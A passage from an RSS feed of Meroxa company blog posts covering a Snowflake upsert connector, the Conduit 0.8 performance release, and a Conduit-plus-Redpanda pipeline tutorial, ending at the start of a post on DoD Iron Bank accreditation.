number&quot;&gt;5&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;data&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; &lt;span class=&quot;token variable&quot;&gt;@file&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;file&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;csv&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;gz &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;FILE_FORMAT &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;  CSV_CONDUIT_SNOWFLAKE &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token 
keyword&quot;&gt;AS&lt;/span&gt; b &lt;span class=&quot;token keyword&quot;&gt;ON&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id
			&lt;span class=&quot;token keyword&quot;&gt;WHEN&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;MATCHED&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;AND&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_operation &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;create&apos;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;OR&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_operation &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;snapshot&apos;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;THEN&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;UPDATE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;SET&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_operation &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_operation&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_created_at &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_created_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_updated_at &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_updated_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_deleted_at &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; b&lt;span 
class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_deleted_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;data&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;data&lt;/span&gt;
			&lt;span class=&quot;token keyword&quot;&gt;WHEN&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;NOT&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;MATCHED&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;AND&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_operation &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;create&apos;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;OR&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_operation &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;snapshot&apos;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;THEN&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;INSERT&lt;/span&gt;  &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_operation&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_created_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_updated_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_deleted_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;data&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;VALUES&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;b&lt;span class=&quot;token 
punctuation&quot;&gt;.&lt;/span&gt;meroxa_operation&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_created_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_updated_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_deleted_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;data&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Also, to speed up the processing of data in our connector, we split the stream of records (say, 10k records in one batch) into several chunks. This allowed us to use goroutines to parallelize generating the CSV files and uploading them.&lt;/p&gt;
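&lt;p&gt;The chunking approach can be sketched in Go roughly as follows (an illustrative sketch: the function names, record type, and chunk size are made up, not the connector&apos;s actual code):&lt;/p&gt;

```go
package main

import (
	"fmt"
	"sync"
)

// chunkRecords splits one incoming batch into chunks of at most size n, so
// that each chunk can be turned into its own CSV file and uploaded
// concurrently.
func chunkRecords(records []string, n int) [][]string {
	var chunks [][]string
	for len(records) > 0 {
		end := n
		if len(records) < n {
			end = len(records)
		}
		chunks = append(chunks, records[:end])
		records = records[end:]
	}
	return chunks
}

func main() {
	batch := []string{"r1", "r2", "r3", "r4", "r5"}
	var wg sync.WaitGroup
	for i, c := range chunkRecords(batch, 2) {
		wg.Add(1)
		go func(i int, c []string) {
			defer wg.Done()
			// In the real connector, this is where the chunk would be
			// written to a CSV file and uploaded to a Snowflake stage.
			fmt.Printf("chunk %d: %d records\n", i, len(c))
		}(i, c)
	}
	wg.Wait()
}
```

&lt;p&gt;With 10k records and a chunk size of, say, 1,000, this yields ten goroutines generating and uploading files in parallel instead of a single sequential pass.&lt;/p&gt;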
&lt;p&gt;While Snowflake allows you to define primary keys, it doesn&apos;t enforce them. That&apos;s a huge issue, as it can result in duplicate rows being inserted for the same primary key. We&apos;ve taken care of that by deduplicating both during CSV file generation and during the merge (we check in both places). Because a batch then contains no duplicates, and because we compact the records in order (say, a CREATE followed by an UPDATE for the same record collapses into one), the single-batch ordering requirement is eliminated.&lt;/p&gt;
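&lt;p&gt;The in-order compaction can be sketched in Go like this (a simplified illustration with made-up types, not the connector&apos;s actual implementation):&lt;/p&gt;

```go
package main

import "fmt"

// Record is a simplified stand-in for a change-data-capture record.
type Record struct {
	ID int
	Op string // "create", "update", "delete", "snapshot"
}

// compact keeps only the last record seen for each ID, preserving the order
// in which IDs first appeared: a CREATE followed by an UPDATE for the same
// row collapses into a single row, so no duplicates reach the CSV file or
// the MERGE.
func compact(batch []Record) []Record {
	pos := make(map[int]int) // ID -> index in out
	var out []Record
	for _, r := range batch {
		if i, ok := pos[r.ID]; ok {
			out[i] = r // later operation wins
			continue
		}
		pos[r.ID] = len(out)
		out = append(out, r)
	}
	return out
}

func main() {
	batch := []Record{{1, "create"}, {2, "create"}, {1, "update"}}
	for _, r := range compact(batch) {
		fmt.Println(r.ID, r.Op)
	}
	// prints:
	// 1 update
	// 2 create
}
```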
&lt;p&gt;We also had to ensure that files were properly compressed and uploaded, so that no data was lost and upload times stayed reasonable.&lt;/p&gt;
&lt;h3&gt;Looking Ahead: Future Enhancements&lt;/h3&gt;
&lt;p&gt;The Snowflake Conduit Connector is a living project, with ongoing enhancements aimed at addressing the evolving needs of Snowflake users. We are committed to continuous improvement, drawing on user feedback and emerging data management trends to refine and expand the connector’s capabilities. The following list is just a few features that are on the horizon:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Multiple tables&lt;/li&gt;
&lt;li&gt;Performance/compression improvements&lt;/li&gt;
&lt;li&gt;Schema detection &amp;#x26; versioning&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Conclusion&lt;/h3&gt;
&lt;p&gt;The Snowflake Conduit Connector is more than just a solution to a problem; it&apos;s a testament to the power of innovation in the face of technical limitations. By enabling real-time upserts and deletes, this connector not only enhances Snowflake&apos;s capabilities but also empowers data-driven companies to manage their data more effectively and efficiently. As we continue to develop and improve the Snowflake Conduit Connector, we look forward to unlocking even greater possibilities for our users, ensuring their data pipelines are as dynamic and robust as the insights they seek to derive.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Conduit 0.8 is here]]></title><description><![CDATA[Conduit 0.8 more than doubles single-pipeline performance.]]></description><link>https://meroxa.com/blog/conduit-0.8-is-here</link><guid isPermaLink="false">https://meroxa.com/blog/conduit-0.8-is-here</guid><dc:creator><![CDATA[Simon Lawrence]]></dc:creator><pubDate>Wed, 15 Nov 2023 15:52:13 GMT</pubDate><content:encoded>&lt;p&gt;We’re happy to announce the latest release of Conduit. While previous releases focused on particular features, this release focuses on performance. Our goal is to make Conduit the default tool for data movement, and handling workloads that demand high throughput is critical to achieving that goal.&lt;/p&gt;
&lt;p&gt;We’re happy to report that we’ve been able to boost performance by over 2.5x to almost 70k msg/s through a single kafka-to-kafka pipeline. We achieved this performance increase with various improvements to the core of Conduit itself and to our &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-kafka/releases/tag/v0.7.0&quot;&gt;Kafka Connector&lt;/a&gt; as well.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Future work&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We’ve made great strides in improving Conduit’s performance but there are still additional improvements we’re eyeing. One of the most promising areas is micro-batching. With micro-batching N records are combined into a single record for processing and then split into N records again for writing to the destination. With this experimental batching work we’ve been able to push almost 250K msg/s through a single pipeline. This is really exciting and shows just how much more room the team has to improve performance.&lt;/p&gt;
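&lt;p&gt;Conceptually, micro-batching looks something like this Go sketch (a toy illustration using strings as stand-in records and an arbitrary separator, not Conduit&apos;s actual implementation):&lt;/p&gt;

```go
package main

import (
	"fmt"
	"strings"
)

// sep is a record separator assumed not to occur in the payloads.
const sep = "\x1e"

// combine packs N records into a single synthetic record for the trip
// through the pipeline.
func combine(records []string) string {
	return strings.Join(records, sep)
}

// split unpacks the synthetic record back into the original N records
// before writing to the destination.
func split(batch string) []string {
	return strings.Split(batch, sep)
}

func main() {
	records := []string{"a", "b", "c"}
	batch := combine(records) // one record flows through the pipeline
	out := split(batch)       // N records again at the destination
	fmt.Println(len(out))     // prints 3
}
```

&lt;p&gt;The win comes from paying per-record pipeline overhead once per batch instead of once per record.&lt;/p&gt;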
&lt;p&gt;If you’d like to check it out, the experimental work on micro-batching can be found in a &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-kafka/tree/lovro/spike-microbatch&quot;&gt;branch&lt;/a&gt; of the Kafka connector repo.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;We’d love your feedback!&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;As always, we’d love to hear from you. Post issues, share your thoughts in discussions or join us on &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt; or &lt;a href=&quot;https://twitter.com/conduitio&quot;&gt;Twitter&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Check out the full release notes on the &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.8.0&quot;&gt;Conduit Changelog&lt;/a&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Real-Time, Real Fast: Supercharging Data Pipelines with Conduit & Redpanda]]></title><description><![CDATA[Revamp your data pipelines with Conduit and Redpanda! Swap Kafka and Kafka Connect complexities for a swift, user-friendly alternative.]]></description><link>https://meroxa.com/blog/data-pipelines-conduit-redpanda</link><guid isPermaLink="false">https://meroxa.com/blog/data-pipelines-conduit-redpanda</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Wed, 06 Sep 2023 16:45:56 GMT</pubDate><content:encoded>&lt;p&gt;In today&apos;s rapidly evolving data landscape, achieving seamless data integration and high-performance stream processing has never been more critical. While Apache Kafka and Kafka Connect have long been the go-to solutions for many organizations, they often come with a steep learning curve and an intricate ecosystem that can slow down development cycles.&lt;/p&gt;
&lt;p&gt;Enter &lt;a href=&quot;https://conduit.io&quot;&gt;Conduit&lt;/a&gt; and &lt;a href=&quot;https://redpanda.com&quot;&gt;Redpanda&lt;/a&gt;: a match made in data streaming heaven. Conduit&apos;s intuitive, developer-friendly platform joins forces with Redpanda&apos;s lightning-fast, Kafka-compatible data streaming engine to offer an alternative that&apos;s not just easier to use, but also significantly outperforms traditional setups in terms of throughput and latency. From simplified configurations to a resource-efficient architecture, the Conduit-Redpanda combo makes data integration and stream processing faster, smoother, and more scalable than ever before.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;The Pain Points of Kafka and Kafka Connect&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Navigating the world of Kafka and Kafka Connect often feels like walking through a maze of complexities. Right from the start, you&apos;re faced with a steep learning curve and intricate configurations, but that&apos;s just the tip of the iceberg. What&apos;s lurking below the surface are the real monsters: infrastructure and performance challenges. Setting up and maintaining a Kafka cluster requires not just expertise but also significant system resources. The platform&apos;s high CPU and memory consumption can put a strain on your infrastructure, causing performance bottlenecks that are tough to resolve.&lt;/p&gt;
&lt;p&gt;And while Kafka Connect brings the promise of simplifying data integration tasks, it comes with its own set of challenges that can quickly turn into downsides. One glaring issue is its intricate configuration process. Even simple integrations often require verbose and complex JSON configurations, making the initial setup a time-consuming affair. Additionally, Kafka Connect&apos;s scalability and performance don&apos;t always meet the mark, especially when handling large volumes of data. The system&apos;s resource consumption can escalate quickly, necessitating a beefy infrastructure to maintain optimal performance. This leads to added costs and complexity, eroding the supposed ease-of-use that Kafka Connect aims to offer.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Conduit + Redpanda: A Perfect Pairing&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Redpanda is a Kafka replacement written from the ground up in C++, and Conduit is a Kafka Connect replacement built in Go. Neither platform depends on the JVM or ZooKeeper to move data, and both are Kafka wire protocol compliant. Conduit&apos;s UI eliminates the need for verbose configurations, streamlining the data integration process. Additionally, Conduit has an already &lt;a href=&quot;https://conduit.io/docs/connectors/connector-list/&quot;&gt;established and growing list of open source connectors&lt;/a&gt; and a &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-sdk&quot;&gt;Connector SDK&lt;/a&gt; with an accompanying suite of tests that enables you to write your own high-quality, performant custom connectors. Redpanda outperforms Kafka in terms of speed and latency while consuming fewer system resources. This allows for a more efficient utilization of hardware, reducing operational costs. Both tools are designed with a focus on developer experience, making it easier to set up, manage, and scale data streams. Together, Redpanda and Conduit provide a more performant, resource-efficient, and developer-friendly alternative to Kafka and Kafka Connect.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Getting Started&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;To show you how easy it is to get started with Conduit and Redpanda, we’re going to build a simple pipeline that uses a built-in Conduit connector to generate random data into a Redpanda topic. Conduit will then consume that data and write it out to a file.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Conduit-Redpanda%20blog%20post_09062023_Image%201.png&quot; alt=&quot;Conduit-Redpanda blog post_09062023_Image 1&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Installation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Installing Conduit and Redpanda is pretty simple. Follow the step-by-step guides (&lt;a href=&quot;https://conduit.io/docs/introduction/getting-started/&quot;&gt;Conduit Guide&lt;/a&gt;, &lt;a href=&quot;https://docs.redpanda.com/current/get-started/quick-start/&quot;&gt;Redpanda Guide&lt;/a&gt;) to get your data streaming in no time. We’re going to use the Redpanda CLI, &lt;strong&gt;rpk&lt;/strong&gt;, to create topics, producers, and consumers. Follow the &lt;a href=&quot;https://docs.redpanda.com/current/get-started/rpk-install/&quot;&gt;instructions to download and install rpk&lt;/a&gt; for your specific environment.&lt;/p&gt;
&lt;h3&gt;Running Redpanda and Creating a Topic&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;Start the Redpanda cluster&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;rpk container start &lt;span class=&quot;token parameter variable&quot;&gt;-n&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;3&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;# creates a 3-node cluster&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol&gt;
&lt;li&gt;Create a topic named &lt;code class=&quot;language-text&quot;&gt;conduit-demo&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;rpk topic create conduit-demo &lt;span class=&quot;token comment&quot;&gt;# creates a topic&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol&gt;
&lt;li&gt;To test that everything is working, open a new terminal window (you should have two open right now). In the new window, run:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;rpk topic consume conduit-demo &lt;span class=&quot;token parameter variable&quot;&gt;--brokers&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;broker1_addr&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;,&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;broker2_addr&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;..&lt;/span&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol&gt;
&lt;li&gt;In the original window, run the following command, then type text into the producer window as shown in the picture below:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;rpk topic produce conduit-demo &lt;span class=&quot;token parameter variable&quot;&gt;--brokers&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;broker1_addr&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;,&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;broker2_addr&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;..&lt;/span&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;You should see the following:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Conduit-Redpanda%20Blog%20Post_09062023_Image%202.png&quot; alt=&quot;Conduit-Redpanda Blog Post_09062023_Image 2&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Configuring and Running the Conduit Pipeline&lt;/h3&gt;
&lt;p&gt;You can build pipelines with Conduit in three ways: the &lt;a href=&quot;https://conduit.io/docs/features/ui&quot;&gt;built-in UI&lt;/a&gt;, the &lt;a href=&quot;https://conduit.io/docs/features/api&quot;&gt;API&lt;/a&gt;, and &lt;a href=&quot;https://conduit.io/docs/pipeline-configuration-files/getting-started&quot;&gt;pipeline configuration files&lt;/a&gt;. For this example, we’ll use pipeline configuration files. For detailed specs on all the pipeline configuration options, see the &lt;a href=&quot;https://conduit.io/docs/pipeline-configuration-files/specifications&quot;&gt;docs&lt;/a&gt;, and reference each connector&apos;s specific configuration options in their &lt;a href=&quot;https://conduit.io/docs/connectors/connector-list&quot;&gt;respective GitHub repos&lt;/a&gt;.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Create a folder called &lt;strong&gt;&lt;code class=&quot;language-text&quot;&gt;pipelines&lt;/code&gt;&lt;/strong&gt; at the same level as your Conduit binary. Inside that folder, create a file named &lt;code class=&quot;language-text&quot;&gt;rand-rp-file.yml&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Copy the following code block into &lt;code class=&quot;language-text&quot;&gt;rand-rp-file.yml&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;version: 2.0
pipelines:
  - id: randorpfile # Pipeline ID [required]
    status: running # Pipeline status at startup (running or stopped)
    description: random generator to file using redpanda
    connectors: # List of connector configurations
      - id: rando_src # Connector ID [required]
        type: source # Connector type (source or destination) [required]
        plugin: builtin:generator # Connector plugin [required]
        settings: # A map of configuration keys and values for the plugin (specific to the chosen plugin)
          format.type: raw # This property is specific to the generator plugin
          format.options: &quot;id:int,email:string&quot; # This property is specific to the generator plugin
      - id: rp_dest # [required]
        type: destination # [required]
        plugin: builtin:kafka # [required]
        settings:
          servers: &quot;&amp;lt;broker1_addr,broker2_addr,broker3_addr&gt;&quot; # [required]
          topic: conduit-demo # [required]
      - id: rp_src # [required]
        type: source # [required]
        plugin: builtin:kafka # [required]
        settings:
          servers: &quot;&amp;lt;broker1_addr,broker2_addr,broker3_addr&gt;&quot; # [required]
          topic: conduit-demo # [required]
      - id: file_dest # [required]
        type: destination # [required]
        plugin: builtin:file # [required]
        settings:
          path: ./output.txt # [required]&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol&gt;
&lt;li&gt;Run the Conduit server from your terminal:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;./conduit&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol&gt;
&lt;li&gt;Navigate to &lt;strong&gt;&lt;code class=&quot;language-text&quot;&gt;http://localhost:8080&lt;/code&gt;&lt;/strong&gt; to check Conduit&apos;s UI and you should see the following:&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Conduit-Redpanda%20Blog%20Post_09062023_Image%203.png&quot; alt=&quot;Conduit-Redpanda Blog Post_09062023_Image 3&quot;&gt;&lt;/p&gt;
&lt;p&gt;You can view the data flowing through the Redpanda topic by opening up a new terminal window and running the following command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;rpk topic consume conduit-demo &lt;span class=&quot;token parameter variable&quot;&gt;--brokers&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;broker1_addr,broker2_addr,broker3_addr&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If everything works correctly, the contents of &lt;code class=&quot;language-text&quot;&gt;output.txt&lt;/code&gt; should match the data in the topic.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Conduit and Redpanda offer an alternative that is not only easier on your development team but also on your infrastructure. They eliminate the operational overhead and complexity, freeing you to focus on what really matters—your data and how it drives your business. So if you&apos;re looking to make the switch to a more efficient, developer-friendly platform, look no further. Conduit and Redpanda are not just the future of data streaming; they&apos;re the smarter choice for today.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Additional Resources&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;For more information, visit the &lt;a href=&quot;https://conduit.io/docs/introduction/getting-started/&quot;&gt;Conduit Documentation&lt;/a&gt; and &lt;a href=&quot;https://docs.redpanda.com/&quot;&gt;Redpanda Documentation&lt;/a&gt;. Join our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;community forums&lt;/a&gt; to stay up-to-date and get answers to all your questions.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Conduit Accredited in Iron Bank DoD Centralized Artifacts Repository]]></title><description><![CDATA[Visit conduit.io to download and learn how to use Conduit, the secure and efficient open-source data integration tool accredited by the DoD Iron Bank.]]></description><link>https://meroxa.com/blog/conduit-accredited-in-iron-bank-dod-centralized-artifacts-repository</link><guid isPermaLink="false">https://meroxa.com/blog/conduit-accredited-in-iron-bank-dod-centralized-artifacts-repository</guid><dc:creator><![CDATA[William Hill]]></dc:creator><pubDate>Mon, 28 Aug 2023 15:55:31 GMT</pubDate><content:encoded>&lt;p&gt;In our ongoing efforts to support the U.S. Department of Defense (DoD) with high-performing products and services, we were confronted with an operational challenge. Each time we started a new project, Conduit, our open-source data integration tool, had to undergo a thorough security review process, a requirement dictated by the DoD&apos;s stringent security standards for all vendors. This caused considerable delays to the start of each new project we were involved with and hindered our ability to secure new projects within the department.&lt;/p&gt;
&lt;p&gt;We needed a solution to expedite the availability of Conduit and make project initiations more efficient. Therefore, we decided to submit Conduit to a trusted repository run by Iron Bank, a government contractor.&lt;/p&gt;
&lt;p&gt;Having successfully gone through the rigorous testing by Iron Bank, Conduit has bypassed the lengthy and recurring security review processes that would happen on individual engagements with different groups in various agencies. As a result of Conduit&apos;s full compliance by Iron Bank, Meroxa can now give the DoD access to this essential tool right away, significantly speeding up project operations.&lt;/p&gt;
&lt;p&gt;Read on to learn more about Iron Bank’s security clearance process and what it says about the security of Conduit.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;What is Iron Bank?&lt;/strong&gt;&lt;/p&gt;
